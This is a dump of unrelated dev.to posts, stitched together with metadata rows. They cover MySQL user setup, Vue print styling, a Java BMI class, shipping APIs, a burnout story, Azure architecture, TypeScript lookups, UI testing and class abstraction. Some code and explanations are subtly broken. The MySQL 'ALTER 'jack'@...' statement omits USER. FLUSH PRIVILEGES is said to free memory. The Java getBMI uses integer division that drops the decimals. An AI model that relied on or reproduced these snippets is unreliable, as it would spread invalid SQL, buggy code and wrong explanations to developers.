You will need to set the password for the root account if you are running the installation on an Ubuntu machine because authentication is deactivated on Ubuntu by default. So as to avoid an error, you’ll need to configure the root account authentication method
sudo mysql
Change the password for root using ALTER USER:
mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
Exit after making this change
mysql> exit
## Secure your MySQL root user account
In securing your server, you will need to execute the following command to setup your password policy
sudo mysql_secure_installation
The password policy given will apply to subsequent users accounts created.
The next is to authenticate using the root user’s password:
mysql -u root -p
This command gives the root user access to the MySQL cli, and also to interact directly with the MySQL server.
Then go back to using the default authentication method using this command:
mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH auth_socket;
This will allow you connect using the sudo mysql command again.
## **Creating default/new MySQL user and its privileges**
It is bad OpSec to use the root account to perform regular day-to-day action on the database. The best option is to create a user account with limited privileges.
This is first done by logging in as root with the following command:
sudo mysql
Alternatively, if you have previously set a password for the root account use this instead:
mysql -u root -p
Next create a new user:
mysql> CREATE USER 'username'@'host' IDENTIFIED WITH authentication_plugin BY 'password';
After entering the command, follow the prompt and fill in your username, hostname (localhost if you’re using Ubuntu).
For authentication, you have the options of using auth_socket plugin which provides string security without requiring a password but has a shortcoming of preventing remote connections,authentication_plugin plugin, caching_sha2_password which is the default MySQL plugin, but its shortfall is that some versions of PHP are not compatible with it or mysql_native_password plugin.
mysql> CREATE USER 'jack'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
You can also alter an existing user using:
mysql> ALTER 'jack'@'hostname' IDENTIFIED WITH mysql_native_password BY 'password';
## Assigning privileges
After creating the user, you can assign it with privileges with the following syntax.
mysql> GRANT PRIVILEGE ON database.table TO 'username'@'host';
Using GRANT ALL PRIVILEGES instead will give the user superuser privileges similar to that of root. Such flag will otherwise defeat the purpose of creating a separate user account from root.
The PRIVILEGE variable represents what action a user is allowed to perform. Global privileges can also be granted by replacing database.table with *.
Below we will be granting user permissions to create, modify, delete, insert, select, update and delete data from a table by using CREATE, ALTER, DROP, INSERT, SELECT, UPDATE and DELETE respectively.
mysql> GRANT CREATE, ALTER, DROP, INSERT, UPDATE, DELETE, SELECT on *.* TO 'jack'@'hostname' WITH GRANT OPTION;
The WITH GRANT OPTION flag allows the user to grant privileges it has to other users.
Next we will use the FLUSH PRIVILEGES command to empty the cache and free up memory:
mysql> FLUSH PRIVILEGES;
After you can exit the MySQL cli
mysql> exit
You can now log in back using your credentials
mysql -u jack -p
## Testing the MySQL server
You can now verify that the MySQL server is running with the following command:
systemctl status mysql.service
Alternatively, you can connect to the MySQL database using the administrative command tool mysqladmin.
sudo mysqladmin -p -u jack version
| oyololatoni |
1,878,476 | new member | am new here | 0 | 2024-06-05T21:03:55 | https://dev.to/dauda_ishaya_6a0327b1bdd0/new-member-4c8b | am new here | dauda_ishaya_6a0327b1bdd0 | |
1,878,401 | Designing Print-Ready Components in Your Web App | In many web applications, there comes a time when you need to add print functionality. Whether it's... | 0 | 2024-06-05T21:02:01 | https://dev.to/joseph42a/designing-print-ready-components-in-your-web-app-3i00 | webdev, print, frontend, javascript | In many web applications, there comes a time when you need to add print functionality. Whether it's for printing invoices, reports, or any other custom components, having a seamless and efficient print solution is crucial. In this blog post, I'll demonstrate how to handle printing in your Vue.js application. The approach we'll cover is also applicable to other frameworks, enabling you to design your print components directly in Vue and print them without the need for manual HTML and CSS in a custom script tag.
## Approach Explanation
1. Add Specific Route for Print: Create a dedicated route for your print component to ensure it opens in a new window with the correct context.
2. Design Your Print Component: Style your print component with all necessary elements, ensuring it appears exactly as desired for printing.
3. Open Print Page in New Window: Use JavaScript to open the print route in a new window, providing a seamless transition for users.
4. Print the Component on Mounted: Trigger the print function directly once the component is mounted, ensuring the print dialog appears immediately.
5. Close the Window After Print: Automatically close the print window after the user completes the print action, enhancing the user experience.
## Handling Print in Vue.js
First, let's create a Vue component dedicated to printing. This component will be responsible for rendering the content to be printed and initiating the print action, it is just like a template, The template will contain the content we want to print, including an image and a table with sample data.
```
<script setup lang="ts">
import { DUMMY_DATA } from '@/DUMMY';
import { ref, watch } from 'vue';
/**
* This Component is only for printing
* Design in vuejs and print what you see
*/
const imageLoaded = ref(false);
// Once header image loaded print & close window
watch(imageLoaded, () => {
window.print();
window.close();
});
</script>
<template>
<Teleport to="body">
<div class="modal" style="position: absolute; top: 0; left: 0; width: 100%">
<div id="printContainer" style="background-color: white">
<table style="width: 100%">
<thead>
<tr>
<td colspan="7" class="invoice-header">
<div class="header-container">
<div>
<img
width="100"
src="@/assets/logo.svg"
@load="imageLoaded = true"
/>
</div>
<h1>Your Company</h1>
<h3>Your Address</h3>
</div>
</td>
</tr>
<tr>
<th>Product</th>
<th>Unit Price</th>
<th>Amount</th>
<th>Total Price</th>
</tr>
</thead>
<tbody>
<tr v-for="item in DUMMY_DATA" :key="item.id">
<td>{{ item.product }}</td>
<td>{{ item.unitPrice }}</td>
<td>{{ item.amount }}</td>
<td>{{ item.totalPrice }}</td>
</tr>
</tbody>
</table>
</div>
</div>
</Teleport>
</template>
```
Here I've a table that I want to display some data, note that I've used an image in my invoice, so the approach is directly printing the opened window, inorder to make sure image is loaded I've added a simple state to indicate image is loaded or not, so only print after image is completly loaded, you can omit this if you don't have image on your template and directly onMounted the component print that window.
Also note that I use Teleport to move the content to the body for printing.
And here is the important part which is CSS specific styles for printing
```
<style>
/* General print styles here */
#printContainer {
table {
width: 100%;
border-collapse: collapse;
break-inside: auto;
page-break-inside: auto;
}
.header-container {
display: flex;
justify-content: space-between;
align-items: center;
}
table td,
table th {
padding: 1.5mm;
border: 2px solid #ccc;
border: 2px solid #ccc;
vertical-align: top;
font-size: inherit;
}
table td.invoice-header {
border: none;
}
table th {
text-align: left;
vertical-align: bottom;
color: rgb(0, 0, 30);
background-color: #04aa6d;
}
tr:nth-child(even) {
background-color: #f2f2f2;
}
tr:hover {
background-color: #ddd;
}
thead {
display: table-header-group;
}
tfoot {
display: table-footer-group;
}
tr {
page-break-inside: avoid;
page-break-after: auto;
}
table td,
table th,
table tr {
/* Prevent elements from being split across pages in paginated media (like print) */
break-inside: avoid;
/* Automatically insert a page break after the element, if needed */
break-after: auto;
}
}
/* Apply styles only when the document is being printed */
@media print {
/* Apply styles to the printed page */
@page {
size: auto;
/* Set the page margins, hide default header and footer */
margin: 0.15in 0.3in 0.15in 0.3in !important;
}
body {
/* Ensure that colors are printed exactly as they appear on the screen */
print-color-adjust: exact;
-webkit-print-color-adjust: exact;
}
}
</style>
```
## Importance of Print-Specific Styles
When implementing print functionality in your web application, it's essential to define specific styles that ensure your content is presented correctly when printed. Here, we'll discuss the crucial styles used in our Vue.js print component and their importance in achieving a high-quality printed output.
```
table {
width: 100%;
border-collapse: collapse;
break-inside: auto;
page-break-inside: auto;
}
```
`break-inside: auto;` `page-break-inside: auto;` Prevents elements from being split across pages.
## Repeat the header and footer when printing
```
thead {
display: table-header-group;
}
tfoot {
display: table-footer-group;
}
```
`display: table-header-group;` `display: table-footer-group;` Ensures the table headers and footers are repeated on each printed page.
## Prevent split rows across pages
```
tr {
page-break-inside: avoid;
page-break-after: auto;
}
```
`page-break-inside: avoid;` Prevents rows from being split across pages.
`page-break-after: auto;` Automatically inserts a page break after the row if needed.
## Print Media Query
```
@media print {
@page {
size: auto;
margin: 0.15in 0.3in 0.15in 0.3in !important;
}
body {
print-color-adjust: exact;
-webkit-print-color-adjust: exact;
}
}
```
## Remove default header and footer when printing
Using margin on printed page we can hide the default header and footer of the page, here is the worked value for me is `margin: 0.15in 0.3in 0.15in 0.3in`
## Print exact colors in the page
`print-color-adjust: exact; -webkit-print-color-adjust: exact;` Ensures that colors are printed exactly as they appear on the screen, maintaining the intended design.
## Conclusion
In this article, we've covered how to handle printing in your Vue.js application by defining print-specific styles and ensuring components are print-friendly. This approach, applicable to other frameworks as well, helps create a seamless print experience. Key elements include setting appropriate print styles, managing page breaks, and ensuring color accuracy. For a complete working sample and detailed implementation, check out the [GitHub repository](https://github.com/Joseph42A/Printing-with-VueJS). Thank you for reading!
| joseph42a |
1,878,474 | Thinking in Objects | The procedural paradigm focuses on designing methods. The object-oriented paradigm couples data and... | 0 | 2024-06-05T20:55:27 | https://dev.to/paulike/thinking-in-objects-44nb | java, programming, learning, beginners | The procedural paradigm focuses on designing methods. The object-oriented
paradigm couples data and methods together into objects. Software design using the object-oriented paradigm focuses on objects and operations on objects. Classes provide more flexibility and modularity for building reusable software. This section improves the solution for a problem introduced in previous post using the object-oriented approach. From these improvements, you will gain insight into the differences between procedural and object-oriented programming and see the benefits of developing reusable code using objects and classes.
ComputeAndInterpretBMI.java, [here](https://dev.to/paulike/case-study-computing-body-mass-index-and-computing-taxes-4jck) presented a program for computing body mass index. The code cannot be reused in other programs, because the code is in the **main** method. To make it reusable, define a static method to compute body mass index as follows:
`public static double getBMI(double weight, double height)`
This method is useful for computing body mass index for a specified weight and height. However, it has limitations. Suppose you need to associate the weight and height with a person’s name and birth date. You could declare separate variables to store these values, but these values would not be tightly coupled. The ideal way to couple them is to create an object that contains them all. Since these values are tied to individual objects, they should be stored in instance data fields. You can define a class named **BMI** as shown in Figure below.

Assume that the **BMI** class is available. The program below gives a test program that uses this class.

Line 6 creates the object **bmi1** for **Kim Yang** and line 9 creates the object **bmi2** for **Susan King**. You can use the instance methods **getName()**, **getBMI()**, and **getStatus()** to return the BMI information in a **BMI** object.
The **BMI** class can be implemented as in below.
```
package demo;
public class BMI {
private String name;
private int age;
private double weight; // in pounds
private double height; // in inches
public static final double KILOGRAMS_PER_POUND = 0.45359237;
public static final double METERS_PER_INCH = 0.0254;
public BMI(String name, int age, double weight, double height) {
this.name = name;
this.age = age;
this.weight = weight;
this.height = height;
}
public BMI(String name, double weight, double height) {
this(name, 20, weight, height);
}
public double getBMI() {
double bmi = weight * KILOGRAMS_PER_POUND / ((height * METERS_PER_INCH) * (height * METERS_PER_INCH));
return Math.round(bmi * 100) / 100;
}
public String getStatus() {
double bmi = getBMI();
if(bmi < 18.5)
return "Underweight";
else if(bmi < 25)
return "Normal";
else if(bmi < 30)
return "Overweight";
else
return "Obese";
}
public String getName() {
return name;
}
public int getAge() {
return age;
}
public double getWeight() {
return weight;
}
public double getHeight() {
return height;
}
}
```
The mathematical formula for computing the BMI using weight and height is given in linked post above. The instance method **getBMI()** returns the BMI. Since the weight and height are instance data fields in the object, the **getBMI()** method can use these properties to compute the BMI for the object.
The instance method **getStatus()** returns a string that interprets the BMI. The interpretation is also given in linked post.
This example demonstrates the advantages of the object-oriented paradigm over the procedural paradigm. The procedural paradigm focuses on designing methods. The object-oriented paradigm couples data and methods together into objects. Software design using the object-oriented paradigm focuses on objects and operations on objects. The object-oriented approach combines the power of the procedural paradigm with an added dimension that integrates data with operations into objects.
In procedural programming, data and operations on the data are separate, and this methodology requires passing data to methods. Object-oriented programming places data and the operations that pertain to them in an object. This approach solves many of the problems inherent in procedural programming. The object-oriented programming approach organizes programs in a way that mirrors the real world, in which all objects are associated with both attributes and activities. Using objects improves software reusability and makes programs easier to develop and easier to maintain. Programming in Java involves thinking in terms of objects; a Java program can be viewed as a collection of cooperating objects. | paulike |
1,878,472 | Unlocking the Potential of Free Shipping APIs | In the fast-paced world of eCommerce, efficient shipping solutions can make or break a business. As... | 0 | 2024-06-05T20:53:03 | https://dev.to/ericksmith14/unlocking-the-potential-of-free-shipping-apis-5f0m | api, shipping | In the fast-paced world of eCommerce, efficient shipping solutions can make or break a business. As online retailers strive to meet customer demands for fast, reliable delivery, the role of shipping APIs becomes increasingly crucial. Among the myriad options available, Free Shipping APIs stand out as a cost-effective solution. But are they truly worth the investment? Let's delve into the world of Free Shipping APIs to uncover their potential benefits and limitations.
## Understanding Free Shipping APIs
[Free Shipping APIs](https://shippingdataapi.com/), also known as Free Carrier APIs, are application programming interfaces that facilitate seamless communication between eCommerce platforms and shipping carriers. These APIs empower merchants to automate various aspects of the shipping process, from generating shipping labels to calculating shipping rates and tracking shipments in real-time. By integrating with a Free Shipping API, businesses can streamline their logistics operations, enhance customer satisfaction, and ultimately drive revenue growth.
## The Value Proposition of Free Shipping APIs
One of the most compelling advantages of Free Shipping APIs is their cost-effectiveness. Unlike traditional shipping APIs that may incur hefty subscription fees or transactional charges, Free Shipping APIs offer merchants access to essential shipping functionalities at no additional cost. This affordability makes them particularly appealing to small and medium-sized businesses operating on tight budgets.
Moreover, Free Shipping APIs democratize access to cutting-edge shipping technologies, enabling businesses of all sizes to compete on a level playing field. By harnessing the power of these APIs, merchants can offer competitive [shipping rates](https://dev.to/ericksmith14/how-to-integrate-a-shipping-api-a-step-by-step-guide-for-developers-4e7g), expedited delivery options, and superior shipment tracking capabilities, thus enhancing the overall customer experience and fostering brand loyalty.
## Maximizing Efficiency with Free Shipping APIs
Beyond cost savings, Free Shipping APIs empower merchants to automate and optimize their shipping workflows. Through seamless integration with eCommerce platforms and shipping carriers, these APIs facilitate swift order fulfillment, accurate shipment tracking, and efficient inventory management. By eliminating manual tasks and reducing human error, businesses can streamline their operations, minimize shipping delays, and improve productivity.
Furthermore, Free Shipping APIs enable merchants to gain valuable insights into their shipping performance and customer behavior. By analyzing shipping data and tracking metrics such as delivery times, shipping costs, and customer satisfaction ratings, businesses can identify areas for improvement, refine their shipping strategies, and drive operational efficiencies.
## Navigating the Limitations
While Free Shipping APIs offer numerous benefits, it's essential to acknowledge their limitations. Compared to premium shipping APIs, Free Shipping APIs may have fewer features or limitations in terms of carrier options, shipping destinations, or customization capabilities. Additionally, reliance on a single Free Shipping API provider could introduce dependency risks, as changes to the API or service interruptions may impact business operations.
## Conclusion: Embracing the Power of Free Shipping APIs
In conclusion, Free [Shipping APIs](https://shippingdataapi.com/) present a compelling value proposition for eCommerce businesses seeking to optimize their shipping operations and enhance customer satisfaction. By offering essential shipping functionalities at no cost, these APIs enable merchants to drive cost savings, streamline logistics workflows, and gain a competitive edge in the marketplace. While they may have limitations compared to premium alternatives, Free Shipping APIs remain a valuable tool for businesses of all sizes looking to unlock the full potential of their shipping capabilities. As the eCommerce landscape continues to evolve, embracing the power of Free Shipping APIs can propel businesses towards success in the digital age. | ericksmith14 |
1,876,905 | What I learned after burnout | For a period during the pandemic, the company I worked for experienced explosive growth, and with... | 0 | 2024-06-05T20:52:39 | https://dev.to/leonardoventurini/what-i-learned-after-burnout-105n | burnout, webdev, productivity, healthydebate | For a period during the pandemic, the company I worked for experienced explosive growth, and with that my responsibilities grew as took a leadership position and the amount of issues related to that growth piled up, more clients, bigger clients, different requirements and all that.
Everything was going smoothly for the first months, but then it all started to derail. I started eating badly, drank more and more caffeine, until I was at point where paranoia started to set in. I would doubt the intentions of what people were telling me, I would suddenly start eyeing my web cam suspiciously suspecting people were even monitoring me. I was severely afraid of being fired, even though I was one the top performers and most respected.
Something was not right with me. At one point a truck cut off the optical fiber of my internet provider and I suddenly could not work, I was not just terrified, I freaked out. I was afraid of everything, I hated myself.
Eventually I could not stand it anymore, and I asked for help, half prepared to get fired... turned out that everything was just in my own head, people were actually way kinder than I expected. I got a vacation and some time to recover from the brunt of it. In truth I would spend the following 2 years to truly recover.
Something was awry, and I couldn't figure out why. I didn't even know where to look. I paid for expensive exams that would tell me nothing. I consulted to all kinds of doctors, some would prescribe me strange drugs which would only make things worse.
I took antidepressants for a few months, but it made my life unbearable, I could not think straight, I would be forgetful. I felt dumb. If I continued with it my worst fears would materialize, I would have to abandon programming completely, and perhaps become poor again or so I told myself.
Eventually, after I had given up, my wife convinced me to do one last battery of exams, which didn't reveal anything new, but the doctor said something different, a clue that triggered a larger process of healing.
My thyroid antibodies were sky high, I knew that and I was on medication for that. But he said that very likely it was caused by some food I was eating, a protein which my body was attacking by producing those same antibodies, and it could be gluten from a few others he mentioned.
Then it dawned on me. A few years before then I lost a huge amount of weight (23kg), but I didn't fully know why, I was biking 15km every day for work, yes, but I was eating a lot too. It was wheat. I had stopped eating wheat.
I remove it and boom, I lose 4kg in 2 weeks and begin to feel my energy come back to me. After about 3 months I am back at my original weight before the pandemic (minus 15 kg). But I didn't stop there. I could not.
I realized that I was still very grumpy and tired, especially in the afternoons and at night. What if it is something I am eating, or rather, drinking? Turns out I was already recommended to stop drinking caffeine due to some medications I was taking, but didn't follow through, now I did.
In the beginning, for about a month, it was a nightmare, I was so sleepy and couldn't think well. But then I started to feel better and better, eventually I noticed that I could do the same amount of work I did before, but I would stay rested until the night. I started to smile more, and be interested in people more.
And all along I thought I was just antisocial. No! I was stressed, tired and unhealthy, but I wasn't antisocial at all.
I still had my normal headaches from computer use though, that still prevented me from doing the things I wanted to do. Eventually, I noticed some guy using yellow tinted glasses, that was different I thought. Then I realized, what if my eyes are overstimulated?
I did use some glasses with blue light treatment, perhaps those were too weak. I started calling stores, and I ordered this custom "night drive" glasses, and turns out I have never worked with as much comfort in my life. My headache vanishes.
With that my job, projects and relationships start flourishing again. I am not afraid of the future anymore. Things look brighter than ever.
These realizations took me almost 30 years. I wish I knew that sooner, way sooner. How much farther would I be?
From these we can conclude some things:
1. Never do something because other people do it or tell you to, what is good for them might not be for you, perhaps not even to them and they don't know better. If it is socially cool, ask yourself ten times if you should do it. And remember, no one has your best interests in mind, they might want to but they still might be wrong. Take the responsibility.
2. The unseen world has so much power over the seen world, who would've thought that a small protein from a food that I've eaten every day and seen everyone eat, could be insidiously doing so much harm to me (like smoking the doctor said).
3. We need to be like scientists and observe what we do right or wrong. It's our responsibilities to experiment and improve our own lives, never be satisfied with the status quo, especially if you are in a bad situation.
How many people are going through bad stuff blindly out there? A lot! I hope my words, my experience brings some light to them. Everything can change in the blink of an eye, you only have to believe and have the courage to experiment.
In the beginning it was awful to not be able to eat 90% of the food I saw in the market or in the restaurants. But eventually it became easier and easier. I would never trade how I feel today for anything, certainly not food.
We are like computers in one sense, our inputs directly impact our outputs. Eat well, study well and you will have extraordinary results.
If you enjoyed my story, please check my project, [Metaboard](https://metaboard.cc), it's the next step in my personal growth. It not only helps me directly as a powerful visual second brain, but it is helping me develop my business and product skills. | leonardoventurini |
1,878,470 | CORE AZURE ARCHITECTURE COMPONENTS. | Below are the core Azure Architecture components for Azure cloud Computing.Basically Azure... | 0 | 2024-06-05T20:52:16 | https://dev.to/phillip_ajifowobaje_68724/core-azure-architecture-components-32go | Below are the core Azure Architecture components for Azure cloud Computing.Basically Azure architecture focus on the physical infrastructure, how resources are managed, and have a chance to create an Azure resource.
- Azure's architecture ensures high availability, scalability, and efficient resource management
- Core Azure architectural components include Azure regions, Azure Availability Zones, resource groups, and the Azure Resource Manager.
- A deeper dive into Azure Resource Manager, Availability Zones, regions, resource groups, and other Azure architectural components.
A. **AZURE REGION**:
An Azure region is a set of datacenters that are geographically spread in different parts of the globe. Currently there are 42 regions scattered around the world with plans to grow into other parts of the world. These datacenters are deployed within a defined latency-defined perimeters.An Azure region refers to an area within a geography that contains one or more Azure data centers.
B.**AZURE AVAILABILITY ZONES**:
Azure availability zones are those datacenters within an Azure region for failover and back up. There are multiple availability zones in a given Azure region. Each Availability Zone is a unique physical location within an Azure region, and each zone is supported by one or more data centers, equipped with their own independent power, cooling, and networking infrastructure. Applications and data are protected in each availability zone because they are physically separated from one another and secured, this helps to achieve data resiliency.
C. **RESOURCE GROUPS IN AZURE**:
These are logical container that hold azure resources that are part of a larger Azure solution. These resource groups can host all resources that comprise an overall Azure solution, or they can also host just the resources that need to be managed as part of a group. The administrator gets to decide, based on needs, how to allocate resources in resource groups within Azure.

It is important to note that since all resources within a single resource group usually share a similar lifecycle, it’s important to determine the lifecycle of the resources you plan to place in a single resource group. However, if the database server hosts databases for other applications, its lifecycle is likely different from the web app. That said, the database server might belong in a different resource group with resources that share its lifecycle. Resources can be moved from a resource group if necessary from different regions. Resource groups are often used to manage access controls to resources and better manage billing and resource management.
D. **AZURE RESOURCE MANAGER**:
Azure Resource Manager is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. You use management features, locks, and tag resources, to secure and organize and effectively bill your resources after deployment. You can also use Resource Manager to apply access controls to resources within a resource group because Role-Based Access Control (or RBAC) is natively integrated into the Azure platform.

**SUMMARY**:
Core Azure architectural components such as regions, resource groups, and Availability Zones serve as the underlying building blocks for any Azure solution that gets deployed.
Azure Resource Manager is used to manage these building blocks and the solutions that are built upon them.
While Azure regions dictate where Azure resources are deployed, Availability Zones are used to provide redundancy for those resources that are deployed. Resource groups are used to group and manage related Azure resources that have been deployed to support an overall solution.
| phillip_ajifowobaje_68724 | |
1,878,471 | My Programming Journey | Hi😍 I am excited to share my first post here. I am writing to document my first experience as I ... | 0 | 2024-06-05T20:49:50 | https://dev.to/nessgood6071/my-programming-journey-becoming-a-techie-3pnl | Hi😍 I am excited to share my first post here. I am writing to document my first experience as I become a techie.
Web development has always been an area of great interest to young tech beginners and it involves the design and creation of websites and webpages. It involves the use of the languages such as HTML,CSS, JavaScript etc. It cut across various disciplines such as web design, web programming, and database management. From simple static web pages to complex dynamic web applications, web development covers a broad spectrum of activities aimed at creating engaging and functional online experiences.
My Programming journey has been impactful in this early stage and I know it would be an amazing experience because I am beginning my tech journey as a starter in the right Tech Firm, thanks to White Creativity for acceptance.
Technical skills are now top notch in the society today, and here I am to get one for myself. Since the beginning of my learning as an intern web developer, I would say this had been my best phase since learning began in respect to my course of study. I do not just hear what it's like but I have been given the chance to learn, test and practice the theory I have been taught.
I chose web development as a specialty for starter and it has been amazing creating those lovely web pages and designs, it's really amazing. I started few days ago and I'm glad to have just completed my First HTML and CSS coding Class with the examples attached to it and it was really awesome. I am enthusiastic about classes ahead and practicing higher examples which would equip me to easily solve real life problems. I believe this team through their unique way of teaching and impacting would help me advance and have more reason to love web development.
I do not have much technical exposure on this article because I'm a starter but I hope to have more write-ups on hands-on labs, experiences and exercises as I journey on this path and I trust White Creativity would be a catalyst for me to have more reasons to venture into other tech skills.
I am glad I joined the best team and ready to learn, practice and Explore with #WhiteCreativity.
By Onyechere, Goodness Chimuanya
5th June,2024. | nessgood6071 | |
1,878,409 | Heuristics for identifying legal (documentation) risks as a QA | [This article is not a substitute for professional legal advice. This article does not create an... | 0 | 2024-06-05T20:46:55 | https://dev.to/ashleygraf_/heuristics-for-identifying-legal-documentation-risks-as-a-qa-dl7 | testing | [This article is not a substitute for professional legal advice. This article does not create an attorney-client relationship, nor is it a solicitation to offer legal advice.]
Companies generally have to follow certain requirements for legal documentation. These are that legal documentation such as Terms and Conditions and the Privacy Policy, amongst other documents, must be
- PRESENT
- UP-TO-DATE
- NOT SKIPPABLE
- EASY TO LOCATE AND ACCESS
So if they are BOHNN, you might have an issue.
## BYPASS
Find paths that allow users to BYPASS/SKIP the terms and conditions or the privacy policy page/{other relevant documentation check with your company's lawyer/legal team) when signing up for the product, signing into the platform or buying a new service.
## OUTDATED
Find links to OUTDATED legal copy documents.
Is the copy on the page - if it's directly on the screen - up-to-date?
Do the links to the documentation page or document go to the correct one?
Is the outdated legal documentation still viewable if/when it's not supposed to be?
When all the legal links/documents/copy were updated on the website, were they really ALL updated? Does it match the rest of the links (if it is supposed to match)?
## HIDDEN
Find HIDDEN (links to) legal copy.
A link might be hidden if it blends in with the background colour of the page.
It might also be hidden if it's not accessible from every screen.
## MISSING
Find MISSING (links to) legal copy.
A page might be missing references to the relevant legal copy for that page.
A citation might be incorrect.
The footer might be missing references to the legal pages.
## NOT AGREE
Find paths that allow users to NOT AGREE to the terms and conditions or the privacy policy (for example) when signing up for the product, or signing into the platform, or buying a new service.
If the site is using checkboxes, is it possible to go to the next screen without ticking the relevant checkbox?
If the site is saying, "if you click accept, you accept these terms", can you go to the next screen without accepting? Or maybe if you go backward and forward you can remove the acceptance and continue on?
| ashleygraf_ |
1,878,469 | How-to: Use dictionary in TypeScript | Here is the scenario, I want to create a function getLegsNumber that use this structure as... | 0 | 2024-06-05T20:42:11 | https://dev.to/linediconsine/a-dictionary-in-typescript-31ek | typescript, javascript, webdev | Here is the scenario, I want to create a function `getLegsNumber` that use this structure as dictionary
```Javascript
const mappingAnimalLegs = {
'CAT' : 4,
'DOG' : 4,
'DUCK' : 2
}
```
If I write something like this
```Javascript
function getLegsNumber(animal) {
return mappingAnimalLegs[animal] | 0
}
```
Typescript is not happy and tell us:
`
Element implicitly has an 'any' type because expression of type 'any' can't be used to index type '{ CAT: number; DOG: number; DUCK: number; }'.(7053)
`
So... how I can solve this without adding too much noise ?
Here is my solution:
```Javascript
function getLegsNumber(animal: string): number {
if (animal in mappingAnimalLegs) {
return mappingAnimalLegs[animal as keyof typeof mappingAnimalLegs];
}
return 0
}
```
I can also simplify a bit more with
```Javascript
function getLegsNumber(animal: string): number {
return mappingAnimalLegs[animal as keyof typeof mappingAnimalLegs] | 0
}
```
What do you think?
[Typescript playground as reference](https://www.typescriptlang.org/play/?#code/MYewdgzgLgBAtgQwA5IJZgOYEEysQGwBkBTDCGAXhgG8AoGBmAcgGEsAVJmALhgBYANPUZMAIgHkA4l16DhDMQFUWAaRkwATLQC+tWgDMArmGBRU4GBmJQSZAHII4AI2IAnABQJcBXtFfoMAEpeMENnNxp5GFdrQ1cweGQ0TBw8BCJSCABtLzT8GARyAGtiAE8QfRgoUqRiCsSUANSCWwgAXRgAHxgABh0gA) | linediconsine |
1,878,466 | [WIP] Test UI? | There are different solutions on test UI Jest unit testing Jest Snapshots Integration... | 0 | 2024-06-05T20:31:14 | https://dev.to/linediconsine/wip-test-ui-dl4 | webdev, javascript, programming | There are different solutions on test UI
- Jest unit testing
- Jest Snapshots
- Integration testing
- Image comparison testing
- Accessibility reports
- Manual testing
When to us what? In my experience a big project will end up using all of them.
Let start with the first
## Jest unit testing
> Unit testing is a type of software testing that focuses on individual units or components of a software system.
Nice... but let also mention that:
> we want to test behavior and not implementation
The goal is I can change 100% the implementation and the test will still pass
How? the style is called "Black box testing" and it focus on behavior not on testing each function input output
## Jest Snapshots
As the official docs tell
> Snapshot tests are a very useful tool whenever you want to make sure your UI does not change unexpectedly
The idea is, I take a copy of the rendered component ( only the generated HTML) in a scenario X and I will compare each time I run the test. If it's different... Well, we know something has changed
... to be continued
| linediconsine |
1,878,465 | Millisecond Scale-to-Zero with Unikernels | A solution to intermittent and unpredictable traffic. | 0 | 2024-06-05T20:24:03 | https://dev.to/plutov/millisecond-scale-to-zero-with-unikernels-5bjl | unikraft, unikernels, cloud | ---
title: Millisecond Scale-to-Zero with Unikernels
published: true
description: A solution to intermittent and unpredictable traffic.
tags: Unikraft, unikernels, cloud
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gr62ywypmo19s8s0dzbm.png
---
[Read the full article here](https://packagemain.tech/p/millisecond-scale-to-zero-with-unikernels)
| plutov |
1,877,154 | Transforming Internet Browsing Experience on Desktop: A Proof of Concept | Over time, desktop internet browsing can become clumsy due to the accumulation of numerous open tabs.... | 0 | 2024-06-05T20:23:56 | https://dev.to/maleta/transforming-desktop-browsing-experience-a-proof-of-concept-417 | ux, webbrowser | Over time, desktop internet browsing can become clumsy due to the accumulation of numerous open tabs. You may become attached to tabs you've opened or you forget to close them, and you end up carrying them over to each new browsing session. This issue has been recognized in recent years, and some solutions have been developed to enhance the browsing experience.
The most valuable solution for me was the introduction of [tab grouping in Chrome](https://blog.google/products/chrome/manage-tabs-with-google-chrome/). It helped keep my tabs organized. Before this, there were similar tools to tackle this problem, such as Session Buddy, a Chrome extension that allows you to store and manage sessions effortlessly.
However, both solutions share a common drawback: web browsing now requires time for tab management. While the time involved isn't substantial, it disrupts the browsing flow, requiring a cleanup after each session or cleaning opened tabs during browsing, and that is not fun.
After my last browsing session cleanup, I reflected on how having so many tabs open had become normal. I realized that the web browsing experience hasn't fundamentally changed since [the introduction of tabs](https://en.wikipedia.org/wiki/NetCaptor). When opening a link, you either **replace the current page** or **open in a new tab**.
**What if** there was a way to open a link in the same position as the link itself, without replacing the current page?
This approach should lead to fewer open tabs per session and provide a smoother browsing experience, as your eyes wouldn't need to readjust to a new position.
To test this browsing experience, I built a simple Chrome extension ([source](https://github.com/maleta/link-in-same-page)).
Here's a preview of how it works:

The extension works partially due to [multiple security concerns](https://github.com/maleta/link-in-same-page?tab=readme-ov-file#security-concerns) and the fact that it utilizes the `iframe` HTML element. If this browsing experience is properly integrated, users should have an isolated and safe browsing experience.
Feel free to share your thoughts or suggestions.
| maleta |
1,878,464 | Class Abstraction and Encapsulation | Class abstraction is the separation of class implementation from the use of a class. The details of... | 0 | 2024-06-05T20:22:49 | https://dev.to/paulike/class-abstraction-and-encapsulation-2flo | java, programming, learning, beginners | Class abstraction is the separation of class implementation from the use of a class. The details of implementation are encapsulated and hidden from the user. This is known as class encapsulation. Java provides many levels of abstraction, and _class abstraction_ separates class implementation from how the class is used. The creator of a class describes the functions of the class and lets the user know how the class can be used. The collection of methods and fields that are accessible from outside the class, together with the description of how these members are expected to behave, serves as the _class’s contract_. As shown in Figure below, the user of the class does not need to know how the class is implemented.

The details of implementation are encapsulated and hidden from the user. This is called _class encapsulation_. For example, you can create a **Circle** object and find the area of the circle without knowing how the area is computed. For this reason, a class is also known as an _abstract data type_ (ADT).
Class abstraction and encapsulation are two sides of the same coin. Many real-life examples illustrate the concept of class abstraction. Consider, for instance, building a computer system. Your personal computer has many components—a CPU, memory, disk, motherboard, fan, and so on. Each component can be viewed as an object that has properties and methods. To get the components to work together, you need know only how each component is used and how it interacts with the others. You don’t need to know how the components work internally. The internal implementation is encapsulated and hidden from you. You can build a computer without knowing how a component is implemented.
The computer-system analogy precisely mirrors the object-oriented approach. Each component can be viewed as an object of the class for the component. For example, you might have a class that models all kinds of fans for use in a computer, with properties such as fan size and speed and methods such as start and stop. A specific fan is an instance of this class with specific property values.
